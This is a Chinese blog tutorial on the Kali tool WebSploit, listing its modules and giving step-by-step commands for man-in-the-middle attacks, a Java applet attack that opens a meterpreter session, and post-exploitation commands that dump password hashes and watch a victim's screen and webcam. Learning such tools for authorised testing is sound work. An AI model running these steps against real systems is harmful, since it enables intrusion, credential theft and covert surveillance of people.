kali自动化渗透神器websploit模块介绍

最新推荐文章于 2024-08-12 08:43:09 发布
最新推荐文章于 2024-08-12 08:43:09 发布
阅读量7.4k 收藏 25
点赞数 5
分类专栏: 工具使用 文章标签: websploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37438418/article/details/78979792
版权

websploit

安装websploit

root@kali2:~# apt-get install websploit


root@kali2:~# websploit


db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b 
88   I8I   88 88'     88  `8D 88'  YP 88  `8D 88      .8P  Y8.   `88'   `~~88~~' 
88   I8I   88 88ooooo 88oooY' `8bo.   88oodD' 88      88    88    88       88    
Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88    
`8b d8'8b d8' 88.     88   8D db   8D 88      88booo. `8b  d8'   .88.      88    
 `8b8' `8d8'  Y88888P Y8888P' `8888Y' 88      Y88888P  `Y88P'  Y888888P    YP    


		--=[WebSploit Advanced MITM Framework
	+---**---==[Version :3.0.0
	+---**---==[Codename :Katana
	+---**---==[Available Modules : 20
		--=[Update Date : [r3.0.0-000 20.9.2014]


wsf > help
Commands		Description
---------------		----------------
set 			Set Value Of Options To Modules
scan			Scan Wifi (Wireless Modules)
stop			Stop Attack & Scan (Wireless Modules)
run 			Execute Module
use 			Select Module For Use
os 			Run Linux Commands(ex : os ifconfig)
back			Exit Current Module
show modules		Show Modules of Current Database
show options		Show Current Options Of Selected Module
upgrade			Get New Version
update			Update Websploit Framework 
about			About US

os clear  //清空屏幕
wsf > show modules
Web Modules			Description
-------------------		---------------------
web/apache_users		Scan Directory Of Apache Users
web/dir_scanner			Directory Scanner
web/wmap			Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma				PHPMyAdmin Login Page Scanner
web/cloudflare_resolver		CloudFlare Resolver




Network Modules			Description
-------------------		---------------------
network/arp_dos			ARP Cache Denial Of Service Attack
network/mfod			Middle Finger Of Doom Attack
network/mitm			Man In The Middle Attack
network/mlitm			Man Left In The Middle Attack
network/webkiller		TCP Kill Attack
network/fakeupdate		Fake Update Attack Using DNS Spoof
network/arp_poisoner		Arp Poisoner




Exploit Modules			Description
-------------------		---------------------
exploit/autopwn			Metasploit Autopwn Service
exploit/browser_autopwn		Metasploit Browser Autopwn Service
exploit/java_applet		Java Applet Attack (Using HTML)




Wireless / Bluetooth Modules	Description
-------------------		---------------------
wifi/wifi_jammer		Wifi Jammer
wifi/wifi_dos			Wifi Dos Attack
wifi/wifi_honeypot		Wireless Honeypot(Fake AP)
wifi/mass_deauth		Mass Deauthentication Attack
bluetooth/bluetooth_pod		Bluetooth Ping Of Death Attack


- ------------------------------------------------------------------------------------
web/pma 模块  //测试网址路径
use web/pma
show opions
set target 测试网址
run
***********
开始启动对应配置和模块
检测phpmyadmin的路径
***********
- ------------------------------------------------------------------------------------
exploit/java applet 模块  //java小程序攻击,感觉和beef有点像
show options
set lhost 自己的ip
set interface wlan0
run


目标打开网址后,则可以监听
show sessions   查看链接的ip
sessions -i 1    选择第一个session
进入meterpreter的交互界面
相当于进入服务器了,可以任意提权
执行shell命令 
- ---------------------------------------------------------------------------------------
use network/mitm   //中间人攻击模块,特点:自动化   欺骗 嗅探
set router  你的网关
set target  目标ip地址
run
- ------------------------------------------------------------------------------------
exploit/browser_autopwn   模块
set ubterface wlan0
set interface wlan0

set lhost 本地ip



getsystem                                      #获取sytem权限
hashdump                                     #抓取账户密码hash值  ,然后用ophcrack破解
run vnc                                           #远程连接,监控屏幕
run webcam -p /var/www/          #监控摄像头
background                                   #不退出此meterpreter并返回msf



Wh0ale
关注
专栏目录
WebSploit Framework:WebSploit 是一个高级 MITM 框架-开源
05-30
WebSploit 高级 MITM 框架 [+]Autopwn - 从 Metasploit 用于扫描和利用目标服务 [+]wmap - 从 Metasploit wmap 插件中使用的扫描、爬虫目标 [+]format infector - 将反向和绑定有效载荷注入文件格式 [+]phpmyadmin Scanner [+]CloudFlare resolver [+]LFI Bypasser [+]Apache Users Scanner [+]Dir Bruter [+]admin finder [+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks [+]MITM - Man In The Middle Attack [+]Java Applet Attack [+]MFOD Attack Vector [+]ARP Dos Attack [+]Web Killer Attack [+]Fake Update Attack [+]Fake Access point Attack [+]Wifi Honeypo
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
linux安装websploit工具,Kali Linux Web***测试之 WebSploit
weixin_32620855的博客
05-12 778
WebSploit简介:l一个综合性的,高级的中间人漏洞***框架。l由python编写的开源项目。主要用于远程扫描和分析系统漏洞,它可以非常快速容易和快速的发现系统中的漏洞,并用于深入分析。WebSploit由多个模块组成,具体如下:Autopwn – 使用Metasploit扫描和利用服务漏洞;wmap – 利用Metasploit wmap插件扫描和抓取目标站点;format i...
WebSploit 项目使用教程
最新发布
gitblog_00718的博客
08-12 323
WebSploit 项目使用教程 websploitWebsploit is a high level MITM framework项目地址:https://gitcode.com/gh_mirrors/we/websploit 1. 项目的目录结构及介绍 WebSploit 是一个高级的中间人攻击(MITM)框架,用于扫描和分析远程系统,以发现各种类型的漏洞。以下是 WebSploit 项目的...
Kali Linux Web 渗透测试— 第十二课-websploit
weixin_34392906的博客
01-11 241
Kali Linux Web渗透测试—第十二课-websploit 文/玄魂 目录 Kali Linux Web渗透测试—第十二课-websploit...............................................1 Websploit简介..................................
websploit
cnbird's blog
03-31 1665
http://code.google.com/p/websploit/
Kali Linux Web***测试之 WebSploit
weixin_34081595的博客
12-09 443
WebSploit简介:l   一个综合性的,高级的中间人漏洞***框架。l   由python编写的开源项目。l   源代码:https://github.com/websploit/websploitl   项目地址:http://sourceforge.net/projects/websploit/主要用于远程扫描和分析系统漏洞,它可以非常快速容易和快速的发现系统中的漏洞,并用于深入分析。W...
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
基于Kali Linux的渗透测试.pdf
09-06
基于Kali Linux的渗透测试.pdf 本文档总结了基于Kali Linux的渗透测试的知识点,涵盖了渗透测试的概念、方法、工具和过程等方面。 1. 渗透测试的概念 渗透测试是一种评估计算机网络系统安全的方法,通过模拟恶意...
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
WebSploit Framework V.2.0.3.tar.gz
12-25
WebSploit是一个开源安全扫描和分析系统。
第十二课-websploit.ppt
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
【DeepExploit】基于Metasploit的自动渗透工具在Kali中详细运行教程
Zichel77的博客
10-11 2302
DeepExploit是基于强化学习的一款自动化渗透工具
安全参透之旅第3章 Websploit工具
安全参透之旅
11-07 1339
Websploit是一个用来扫描和分析远程系统以找出漏洞的工具 1、运行Websploit 2、扫描模块 3、输入 use network/webkiller然后用set TARGER命令来设定攻击目标.
websploit全自动******
weixin_34167043的博客
02-02 223
运行websploitshow modules查看所有模块调置***参数这里出错是没有加载模块,网上有这个模块下载,然后利用命令load加载就行。 转载于:https://blog.51cto.com/biock/1610628...
web渗透测试套件 - WebSploit
weixin_30793643的博客
06-06 179
WebSploit 是一个开源项目,主要用于远程扫描和分析系统漏洞。使用它可以非常容易和快速发现系统中存在的问题,并用于深入分析。 WebSploit由多个模块组成: Autopwn – 使用Metasploit扫描和利用服务漏洞; wmap – 利用Metasploit wmap插件扫描和抓取目标站点; format infector – 向文件中注入正向/反向后门; php...
linux安装websploit工具,使用Docker构建Web渗透测试工具容器
weixin_42410443的博客
05-12 235
Docker是世界领先的软件集装化平台,针对不同的渗透测试类型,我们完全可以使用Docker创建相应的环境。有了Docker容器,你可以把测试环境放到U盘或者云端。Docker是什么Docker是一个开源的技术,在软件容器中,你可以创建、运行、测试和部署应用程序。Dcoker可以让你在任何环境中快速、可靠、稳定地部署应用程序。容器具有可移植、方便、快速的优点。使用Docker,我们可以创建一个映...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值